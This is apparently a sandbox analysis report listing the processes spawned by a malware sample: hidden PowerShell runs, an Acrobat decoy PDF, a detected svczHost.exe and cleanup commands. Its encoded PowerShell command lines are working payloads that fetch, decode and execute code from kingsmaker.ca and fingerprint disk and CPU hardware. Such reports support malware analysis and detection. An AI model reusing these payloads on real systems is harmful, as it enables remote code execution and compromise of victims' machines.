                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:03:09:02
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:03:09:06
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:03:09:06
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff795c80000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:03:09:06
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:03:09:06
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:11
                                                                                                            Start time:03:09:08
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"
                                                                                                            Imagebase:0xed0000
                                                                                                            File size:3'891'152 bytes
                                                                                                            MD5 hash:0F4FB7ADA3C27236864D008A1687AD8D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:12
                                                                                                            Start time:03:09:09
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
                                                                                                            Imagebase:0x6f0000
                                                                                                            File size:2'841'040 bytes
                                                                                                            MD5 hash:35AF5C1FA6FAC9569BB3FF6654A7152E
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:13
                                                                                                            Start time:03:09:09
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                            Imagebase:0x6f0000
                                                                                                            File size:2'841'040 bytes
                                                                                                            MD5 hash:35AF5C1FA6FAC9569BB3FF6654A7152E
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:16
                                                                                                            Start time:03:09:38
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\Temp\svczHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
                                                                                                            Imagebase:0x7ff6612d0000
                                                                                                            File size:8'351'232 bytes
                                                                                                            MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 67%, ReversingLabs
                                                                                                            Has exited:false

                                                                                                            Target ID:17
                                                                                                            Start time:03:09:38
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:18
                                                                                                            Start time:03:09:39
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:19
                                                                                                            Start time:03:09:39
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                            Imagebase:0x7ff619390000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:03:09:39
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:21
                                                                                                            Start time:03:09:39
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:03:09:39
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:23
                                                                                                            Start time:03:09:39
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:sc query myRdpService
                                                                                                            Imagebase:0x7ff614980000
                                                                                                            File size:72'192 bytes
                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:24
                                                                                                            Start time:03:09:40
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
